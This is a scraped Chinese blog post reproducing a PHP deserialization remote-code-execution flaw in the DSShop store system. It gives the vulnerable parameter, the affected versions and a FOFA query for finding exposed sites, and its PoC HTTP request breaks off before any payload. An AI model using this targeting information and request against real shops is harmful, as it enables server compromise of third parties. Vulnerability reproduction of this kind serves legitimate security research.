当前位置: 首页 > news >正文

DSShop移动商城网店系统 反序列化RCE漏洞复现

0x01 产品简介

   DSShop是长沙德尚网络科技有限公司推出的一款单店铺移动商城网店系统,能够帮助企业和个人快速构建手机移动商城,并减少二次开发带来的成本。
以其丰富的营销功能,精细化的用户运营,解决电商引流、推广难题,帮助企业打造生态级B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的多用户商城源码,为企业电商业务长线快速发展提供了强有力的保障。 适用企业:各类百货MALL、行业实体市场、电商产业园、行业协会、行业门户网站等。

0x02 漏洞概述

  DSShop单店铺移动商城网店系统的getCartList方法的cart参数存在php反序列化漏洞,攻击者可以通过漏洞执行任意代码,获取服务器权限。

0x03 影响范围

DSShop <=V2

0x04 复现环境

FOFA:title="德尚商城 - 程序来源于德尚网络"

0x05 漏洞复现 

PoC

POST /index.php?s=home/article/index HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
C
http://www.lryc.cn/news/252518.html

相关文章:

  • docker搭建node环境开发服务器
  • 传统制造业企业如何实现数字化转型?
  • 面试:说一下深拷贝,浅拷贝,引用拷贝吧;Object类中的clone是哪种呢?
  • 接口压测指南
  • 计算机辅助药物设计AIDD-小分子-蛋白质|分子生成|蛋白质配体相互作用预测
  • 深度学习-yolo目标检测-机器学习-计算机视觉-python学习路线(呕心沥血出品-绝对精品-附资源链接)
  • ubuntu2204 防火墙ufw限制某ip对某端口的访问
  • 常见代码优化案例记录
  • 【android开发-04】android中activity的生命周期介绍
  • java后端技术演变杂谈(未完结)
  • UDS 诊断报文格式
  • kafka的详细安装部署
  • 【数据分享】2015-2023年我国区县逐月二手房房价数据(Excel/Shp格式)
  • PTA 7-226 sdut-C语言实验-矩阵输出(数组移位)
  • Android 各平台推送通知栏点击处理方案
  • 什么是网络安全 ?
  • 【前端】-【electron】
  • Python中的类(Class)和对象(Object)
  • dp-拦截导弹2
  • 初识动态规划算法(题目加解析)
  • Vue2.0与Vue3.0的区别
  • 探索人工智能领域——每日20个名词详解【day6】
  • C++初阶 | [七] string类(上)
  • Django总结
  • 【qml入门系列教程】:qml QtObject用法介绍
  • 2分图匹配算法
  • [EndNote学习笔记] 导出库中文献的作者、标题、年份到Excel
  • SQL Sever 基础知识 - 数据查询
  • Vue入门——v-on标签
  • JVM:双亲委派(未完结)